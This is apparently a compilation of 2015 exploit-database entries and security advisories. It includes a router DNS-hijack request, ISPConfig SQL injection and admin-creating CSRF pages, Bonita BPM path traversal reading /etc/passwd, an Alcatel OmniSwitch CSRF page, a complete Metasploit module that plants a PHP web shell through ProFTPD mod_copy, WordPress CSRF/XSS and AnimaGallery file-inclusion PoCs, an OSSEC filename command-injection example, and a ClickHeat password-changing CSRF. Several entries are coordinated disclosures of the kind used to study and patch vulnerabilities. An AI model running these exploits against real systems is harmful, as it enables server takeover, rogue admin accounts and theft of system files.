  bears NO responsibility for content or misuse
  of these programs or any derivatives thereof.
  By using these programs you accept the fact
  that any damage (dataloss, system crash,
  system compromise, etc.) caused by the use
  of these programs is not Todor Donev's
  responsibility.
  
  Use them at your own risk!


[todor@adamantium ~]$ GET "http://TARGET/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
HireHackking 
Advisory ID: HTB23260
Product: ISPConfig
Vendor: http://www.ispconfig.org
Vulnerable Version(s): 3.0.5.4p6  and probably prior
Tested Version: 3.0.5.4p6 
Advisory Publication:  May 20, 2015  [without technical details]
Vendor Notification: May 20, 2015 
Vendor Patch: June 4, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: SQL Injection [CWE-89], Cross-Site Request Forgery [CWE-352]
CVE References: CVE-2015-4118, CVE-2015-4119
Risk Level: High 
CVSSv2 Base Scores: 5.8 (AV:N/AC:L/Au:M/C:P/I:P/A:P),  7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular hosting control panel ISPConfig. The vulnerabilities can be exploited to execute arbitrary SQL commands in application database, perform a CSRF attack and gain complete control over the web application.


1) SQL Injection in ISPConfig: CVE-2015-4118

The vulnerability exists due to insufficient filtration of input data passed via the "server" HTTP GET parametre to "/monitor/show_sys_state.php" script before executing a SQL query. A remote authenticated attacker can pass arbitrary SQL commands to the vulnerable script and execute them in application’s database. 

Successful exploitation of this vulnerability will allow an attacker to read, insert and modify arbitrary records in database and compromise the entire web application, but requires the attacker to be authenticated and to have "monitor" privileges. However, in combination with the CSRF vulnerability to which the application is also vulnerable, this vulnerability becomes exploitable by remote non-authenticated attacker. 

A simple exploit below will display MySQL server version. First, use the following HTTP request to execute the SQL query:

https://[host]/monitor/show_sys_state.php?state=server&server=-1%20UNION%20SELECT%201,version%28%29%20--%202|-

After that visit the page mentioned below, the result of MySQL 'version()' function will be displayed in the HTML code of the page:

https://[host]/monitor/show_data.php?type=mem_usage


2) CSRF (Cross-Site Request Forgery) in ISPConfig: CVE-2015-4119

The vulnerability exists due to failure in the "/admin/users_edit.php" script to properly verify the origin of the HTTP request. A remote attacker can create a specially crafted web page with CSRF exploit, trick a logged-in administrator to visit this page and create a new user with administrative privileges. 

A simple CSRF exploit below creates an administrative account with username "immuniweb" and password "immuniweb":


<form action = "https://[host]/admin/users_edit.php" method = "POST" enctype = "multipart/form-data">
<input type="hidden" name="username" value="immuniweb">
<input type="hidden" name="passwort" value="immuniweb">
<input type="hidden" name="repeat_password" value="immuniweb">
<input type="hidden" name="modules[]" value="vm">
<input type="hidden" name="modules[]" value="mail">
<input type="hidden" name="modules[]" value="help">
<input type="hidden" name="modules[]" value="monitor">
<input type="hidden" name="startmodule" value="vm">
<input type="hidden" name="app_theme[]" value="default">
<input type="hidden" name="typ[]" value="admin">
<input type="hidden" name="active" value="1">
<input type="hidden" name="language" value="en">
<input type="submit" id="btn"> 
</form>
<script>
document.getElementById('btn').click();
</script>


-----------------------------------------------------------------------------------------------

Solution:

Update to ISPConfig 3.0.5.4p7

More Information:
http://bugtracker.ispconfig.org/index.php?do=details&task_id=3898

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23260 - https://www.htbridge.com/advisory/HTB23260 - Multiple vulnerabilities in ISPConfig.
[2] ISPConfig - http://www.ispconfig.org - Hosting Control Panel Software.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s):  6.5.1  and probably prior 
Tested Version:  6.5.1 (Windows and Mac OS packages)
Advisory Publication:  May 7, 2015  [without technical details]
Vendor Notification: May 7, 2015 
Vendor Patch: June 9, 2015 
Public Disclosure: June 10, 2015 
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High 
CVSSv2 Base Scores: 7.8  (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted. 

1) Path Traversal in Bonita BPM Portal: CVE-2015-3897

User-supplied input passed via the "theme" and "location" HTTP GET parametres to "bonita/portal/themeResource" URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user.  

Simple PoC code below will return content of "C:/Windows/system.ini" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini

Second PoC will disclose the content of "/etc/passwd" file:

http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd


2) Open Redirect in Bonita BPM Portal: CVE-2015-3898

Input passed via the "redirectUrl" HTTP GET parametre to "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as redirect URL.

After login user may be redirected to arbitrary website:

http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/


-----------------------------------------------------------------------------------------------

Solution:

Update to Bonita BPM 6.5.3

More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery

During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
The management web interface has no protection against cross-site
request forgery attacks. This allows specially crafted web pages to
change the switch configuration and create users, if an administrator
accesses the website while being authenticated in the management web
interface.

Details
=======

Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400,
  6855, 6900, 10K, 6860
Affected Versions: All Releases:
  AOS 6.4.5.R02
  AOS 6.4.6.R01
  AOS 6.6.4.R01
  AOS 6.6.5.R02
  AOS 7.3.2.R01
  AOS 7.3.3.R01
  AOS 7.3.4.R01
  AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805


Introduction
============

"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable
LAN Switches are the latest value stackable switches in the OmniSwitch
family of products. The OmniSwitch 6450 was specifically built for
versatility offering optional upgrade paths for 10 Gigabit stacking, 10
Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and
Metro Ethernet services."

(from the vendor's homepage)

More Details
============

The management web interface of the OmniSwitch 6450 can be accessed
using a web browser via HTTP. The web interface allows creating new user
accounts, in this case an HTTP request like the following is sent to the
switch:

  POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 214

  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:244.T1:O1=secret
  &EmWeb_ns:mip:246.T1:O2=-1
  &EmWeb_ns:mip:248.T1:O3=
  &EmWeb_ns:mip:249.T1:O4=1
  &EmWeb_ns:mip:250.T1:O5=4

This request creates a user "attacker" with the password "secret". All
other parametres are static. All POST parametres can be predicted by
attackers

This means that requests of this form can be prepared by attackers and sent
from any web page the user visits in the same browser. If the user is
authenticated to the switch, a valid session cookie is included in the request
automatically, and the action is performed.

In order to activate the new user for the web interface it is necessary
to enable the respective access privileges in the user's profile. This can also
be done via the web interface. Then the HTTP POST request looks like the
following:

  POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
  Host: 192.0.2.1
  [...]
  Cookie: session=sess_15739
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 167

  EmWeb_ns:mip:2.T1:I1=attacker
  &EmWeb_ns:mip:4.T1:O1=
  &EmWeb_ns:mip:5.T1:O2=
  &EmWeb_ns:mip:6.T1:O3=4294967295
  &EmWeb_ns:mip:7.T1:O4=4294967295

This request sets all access privileges for the user "attacker" and
is again completely predictable.


Proof of Concept
================

Visiting the following HTML page will create a new user via the switch's
management web interface, if the user is authenticated at the switch:

------------------------------------------------------------------------
<html>
<head>
<title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
</head>
<body>
  <form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html"
  method="POST" id="CSRF" style="visibility:hidden">
    <input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
    <input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
  </form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
------------------------------------------------------------------------


Workaround
==========

Disable the web interface by executing the following commands:

AOS6:

  no ip service http
  no ip service secure-http

AOS 7/8:

  ip service http admin-state disable

If this is not possible, use a dedicated browser or browser profile for
managing the switch via the web interface.


Fix
===

Upgrade the firmware to a fixed version, according to the vendor the
fixed versions will be available at the end of July 2015.


Security Risk
=============

If attackers trick a logged-in administrator to visit an attacker-controlled 
web page, the attacker can perform actions and reconfigure the switch. In this
situation an attacker can create an additional user account on the switch for
future access. While a successful attack results in full access to the switch,
the attack is hard to exploit because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.


Timeline
========

2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
      'Description'    => %q{
          This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
          Any unauthenticated client can leverage these commands to copy files from any
          part of the filesystem to a chosen destination. The copy commands are executed with
          the rights of the ProFTPD service, which by default runs under the privileges of the
          'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
          directory, PHP remote code execution is made possible.
      },
      'Author'         =>
        [
          'Vadim Melihow', # Original discovery, Proof of Concept
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2015-3306' ],
          [ 'EDB', '36742' ]
        ],
      'Privileged'     => false,
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'BadChars' => '',
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic gawk bash python perl'
            }
        },
      'Targets'        =>
        [
          [ 'ProFTPD 1.3.5', { } ]
        ],
      'DisclosureDate' => 'Apr 22 2015',
      'DefaultTarget' => 0))

    register_options(
      [
        OptPort.new('RPORT', [true, 'HTTP port', 80]),
        OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
        OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
        OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
        OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
      ], self.class)
  end

  def check
    ftp_port = datastore['RPORT_FTP']
    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    sock.puts("SITE CPFR /etc/passwd\r\n")
    res = sock.get_once(-1, 10)
    if res && res.include?('350')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    ftp_port = datastore['RPORT_FTP']
    get_arg = rand_text_alphanumeric(5+rand(3))
    payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'

    sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
    else
      print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
    end

    res = sock.get_once(-1, 10)
    unless res && res.include?('220')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
    end

    print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")

    sock.puts("SITE CPFR /proc/self/cmdline\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
    end

    sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
    end

    sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('350')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
    end

    sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
    res = sock.get_once(-1, 10)
    unless res && res.include?('250')
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?")
    end

    sock.close

    print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}")
    res = send_request_cgi!(
      'uri' => normalize_uri(target_uri.path, payload_name),
      'method' => 'GET',
      'vars_get' => { get_arg => "nohup #{payload.encoded} &" }
    )

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload")
    end
  end

end
HireHackking 
# Title: CVE-2015-4010 - Cross-site Request Forgery & Cross-site Scripting in Encrypted
Contact Form Wordpress Plugin v1.0.4
# Submitter: Nitin Venkatesh
# Product: Encrypted Contact Form Wordpress Plugin
# Product URL: https://wordpress.org/plugins/encrypted-contact-form/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site
scripting[CWE-79]
# Affected Versions: v1.0.4 and possibly below.
# Tested versions: v1.0.4
# Fixed Version: v1.1
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1125443/
# Changelog: https://wordpress.org/plugins/encrypted-contact-form/changelog/
# CVE Status: CVE-2015-4010

## Product Information:

Secure contact form for WordPress. Uses end-to-end encryption to send user
information. Not even your hosting provider can view the content.

Let users send you information in a secure way. Uses I.CX messaging service
to encrypt user content in their own web browsers before sending to you.

## Vulnerability Description:

The forms in the admin area of the plugin are vulnerable to CSRF, via which
the contact forms generated are susceptible to XSS via unsanitized POST
parametre.

For example, the admin function of updating an existing form can be done
via CSRF. Hence, by submitting a crafted HTML string in the parametres via
CSRF, a XSS attack gets launched which affects all the visitors of the
page(s) containing the contact form.

## Proof of Concept:

<form action="http://localhost/wp-admin/options-general.php?page=conformconf";
method="post">
<input type="hidden" name="name" value="required" />
<input type="hidden" name="email" value="optional" />
<input type="hidden" name="phone" value="off" />
<input type="hidden" name="message" value="required" />
<input type="hidden" name="display_name" value="Example" />
<input type="hidden" name="recipient_name" value="example" />
<input type="hidden" name="cfc_page_name" value="" />
<!-- Wordpress page-id value -->
<input type="hidden" name="existing_page" value="28" />
<input type="hidden" name="cfc_selection" value="upd" />
<input type="hidden" name="iframe_url"
value=""></iframe><script>alert('XSS!');</script>"
/>
<input type="submit" value="Update Page">
</form>

## Solution:

Upgrade to v1.1 of the plugin.

## Disclosure Timeline:

2015-03-26 - Discovered. Contacted developer on support forums.
2015-03-27 - Contacted developer via contact form on vendor site.
2015-04-01 - Fixed v1.1 released.
2015-05-15 - Published disclosure on FD.
2015-05-16 - CVE assigned

## References:

CVE Assign - http://seclists.org/oss-sec/2015/q2/471
http://packetstormsecurity.com/files/131955/
https://wpvulndb.com/vulnerabilities/7992


## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
HireHackking 
# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability 
# Date: 2015/06/07 
# Vendor Homepage: http://dg.no.sapo.pt/ 
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps

* Description

func.php
line 21 - 22:

include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');

$lang and $THEME parametre from import_theme_lang() function.

function import_theme_lang()
{
  $THEME = DEFAULT_THEME;
  if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
    $THEME = $_COOKIE['theme'];  <--  Not Taint Checking

  $LANG = DEFAULT_LANG;
  if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
    $LANG = $_COOKIE['lang'];     <--- Not Taint Checking

  return(array($THEME, $LANG));
}


* Proof of Concept

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"

curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
HireHackking 
Fix for CVE-2015-3222 which allows for root escalation via syscheck - https://github.com/ossec/ossec-hids/releases/tag/2.8.2

Affected versions: 2.7 - 2.8.1

Beginning is OSSEC 2.7 (d88cf1c9) a feature was added to syscheck, which
is the daemon that monitors file changes on a system, called
"report_changes". This feature is only available on *NIX systems. It's
purpose is to help determine what about a file has changed. The logic to
do accomplish this is as follows which can be found in
src/syscheck/seechanges.c:

252 /* Run diff */
253 date_of_change = File_DateofChange(old_location);
254 snprintf(diff_cmd, 2048, "diff \"%s\" \"%s\"> \"%s/local/%s/diff.%d\" "
255     "2>/dev/null",
256     tmp_location, old_location,
257     DIFF_DIR_PATH, filename + 1, (int)date_of_change);
258 if (system(diff_cmd) != 256) {
259     merror("%s: ERROR: Unable to run diff for %s",
260            ARGV0,  filename);
261     return (NULL);
262 }

Above, on line 258, the system() call is used to shell out to the
system's "diff" command. The raw filename is passed in as an argument
which presents an attacker with the possibility to run arbitrary code.
Since the syscheck daemon runs as the root user so it can inspect any
file on the system for changes, any code run using this vulnerability
will also be run as the root user.

An example attack might be creating a file called "foo-$(touch bar)"
which should create another file "bar".

Again, this vulnerability exists only on *NIX systems and is contingent
on the following criteria:

1. A vulnerable version is in use.
2. The OSSEC agent is configured to use syscheck to monitor the file
system for changes.
3. The list of directories monitored by syscheck includes those writable
by underprivileged users.
4. The "report_changes" option is enabled for any of those directories.

The fix for this is to create temporary trusted file names that symlink
back to the original files before calling system() and running the
system's "diff" command.
HireHackking 
# Exploit Title: ClickHeat <1.1.4 Change Admin Password CSRF
# Google Dork: allinurl:/clickheat/
# Date: 11-06-2015
# Exploit Author: David Shanahan (@CyberpunkSec)
# Contact: https://twitter.com/CyberpunkSec
# Vendor Homepage: http://www.labsmedia.com/clickheat/index.html
# Software Link: http://sourceforge.net/projects/clickheat/files/clickheat/
# Version: 1.14
# Tested on: Windows

---- Description ----

ClickHeat is vulnerable to a CSRF attack because it does not implement a
CSRF token when updating the config file.  If an authenticated admin is
tricked into opening this malicious URL, the form will be submitted which
changes the administrator password to the one the attacker has specified.

---- CSRF PoC ----

Set the value of "adminLogin" to the administrators username, then set the
value of "adminPass" to a md5 hash of the password you want. (you may also
need to change the "logPath" & "cachePath")

/* CODE */

<body onload="document.forms[0].submit()">

<form action="http://127.0.0.1/clickheat/index.php?action=config"
method="post" class="center">
<input type="hidden" name="config" value="a:23:{s:7:"logPath";s:31:"C:/xampp
/htdocs/clickheat/logs/";s:9:"cachePath";s:32:"C:/xampp/htdocs/clickheat
/cache/";s:8:"referers";b:0;s:6:"groups";b:0;s:8:"filesize";i:0;s:10:"
adminLogin";s:5:"admin";s:9:"adminPass";s:32:"
5f4dcc3b5aa765d61d8327deb882cf99";s:11:"viewerLogin";s:0:"";s:10:"viewerPass
";s:0:"";s:6:"memory";i:128;s:4:"step";i:5;s:3:"dot";i:19;s:5:"flush";i:40;s:5:"start";s:1:"m";s:7:"palette";b:0;s:7:"
heatmap";b:1;s:11:"hideIframes";b:1;s:11:"hideFlashes
";b:1;s:9:"yesterday";b:0;s:5:"alpha";i:80;s:13:"__screenSizes
";a:10:{i:0;i:0;i:1;i:240;i:2;i:640;i:3;i:800;i:4;i:1024;i:5;i:1152;i:6;i:1280;i:7;i:1440;i:8;i:1600;i:9;i:1800;}s:14:"__
browsersList";a:7:{s:3:"all";s:0:"";s:4:"msie";s:17:"Internet
Explorer";s:7:"firefox";s:7:"Firefox";s:6:"chrome";s:6:"Chrome";s:6:"safari";s:6:"Safari";s:5:"opera";s:5:"Opera";s:7:"unknown";s:0:"";}s:7:"version";s:4:"1.14";}"
/>
<input type="hidden" name="save" value="true" /><input type="submit"
value="Save configuration" /></form>

/* CODE */

---- Solution ----

The ClickHeat project seems to be dead, as it has not been updated since
late 2011.  Due to this, I truly doubt a patch will be issued so I would
recommend removing this product from your website.